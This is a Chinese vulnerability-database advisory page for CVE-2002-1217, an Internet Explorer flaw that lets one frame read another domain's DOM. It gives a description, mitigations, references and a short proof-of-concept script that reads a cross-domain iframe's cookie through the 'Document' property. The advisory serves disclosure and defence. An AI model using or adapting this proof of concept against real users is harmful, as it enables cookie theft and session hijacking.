Microsoft Internet Explorer未授权文档对象模型(DOM)访问漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1107045 漏洞类型 输入验证
发布时间 2002-10-15 更新时间 2006-04-07
CVE编号 CVE-2002-1217 CNNVD-ID CNNVD-200210-282
漏洞平台 Windows CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/21940
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200210-282
|漏洞详情
Microsoft Internet Explorer是微软公司开发和维护的流行的WEB浏览器。 MSIE没有充分检查所有帧属性的访问控制权限,远程攻击者可以利用这个漏洞未授权访问其他不同域中帧/子帧的文档对象模型(Document Object Model)。 和元素可以把URL包含在其他域或者协议中,因此具有严格的安全规则,防止其他域中的帧访问不同域中的内容和信息。MSIE对通过交叉域访问'document'属性具有严格的安全检查规则,但是访问'Document'没有进行充分检查。 一般情况下,使用"oElement.document"可以提供拥有当前元素文档的引用,这在<frame>和<iframe>中都可相同应用,但是,当使用"oIFrameElement.Document"时,返回包含在<frame>中的文档却没有充分检查它是否属于不同领域。这就导致自由和完全访问帧的文档对象模型,允许攻击者窃取任意站点的Cookie信息,访问任意站点的伪造的内容,读取本地文件和在客户机上在"我的电脑"域中执行任意程序。 攻击者可以通过构建恶意WEB页面或者通过HTML形式的电子邮件来触发这个漏洞。 </p> </div> <div class="d_ldjj m_t_20"> <div class="title_bt"> <h2 style="width:100px;">漏洞公告</h2> </div> <div style="height:20px;"></div> <p style="text-indent:2em"> 临时解决方法: 如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:</p><p style="text-indent:2em" class="ldgg"> * 关闭IE浏览器的Active脚本执行功能。 厂商补丁: Microsoft --------- Microsoft Internet Explorer 6.0 SP1补丁程序:</p><p style="text-indent:2em" class="ldgg"> <a href=" http://www.microsoft.com/windows/ie/downloads/critical/ie6sp1/de
|漏洞EXP
source: http://www.securityfocus.com/bid/5963/info

Microsoft Internet Explorer (MSIE) is prone to a vulnerability that may enable a frame or iframe to gain unauthorized access to the Document Object Model (DOM) of other frames/iframes in a different domain. This is possible because MSIE does not perform adequate access control checks on all frame properties. While access to the 'document' property across domains is properly restricted, access to 'Document' is not. This may allow an attacker to violate the browser Same Origin Policy and gain unauthorized access to the properties of frames and iframes that are in a different domain. 

<script language="jscript">
onload=function () {
    // Timer necessary to prevent weird behavior in some conditions
    setTimeout(
        function () {
            alert(document.getElementById("oVictim").Document.cookie);
        },
        100
    );
}
</script>
<iframe src="http://example.com" id="oVictim"></iframe>
|参考资料
resource:
hyperlink:http://archives.neohapsis.com/archives/vulnwatch/2002-q4/0024.html
resource:
hyperlink:http://marc.info/?l=bugtraq&m=103470310417576&w=2
resource:
hyperlink:http://marc.info/?l=ntbugtraq&m=103470202010570&w=2
resource:Exploit
hyperlink:http://security.greymagic.com/adv/gm011-ie/
resource:
hyperlink:http://www.ciac.org/ciac/bulletins/n-018.shtml
resource:
hyperlink:http://www.iss.net/security_center/static/10371.php
resource:
hyperlink:http://www.microsoft.com/technet/security/bulletin/ms02-066.mspx
resource:
hyperlink:http://www.securityfocus.com/bid/5963
resource:
hyperlink:https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A272
resource:
hyperlink:https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A333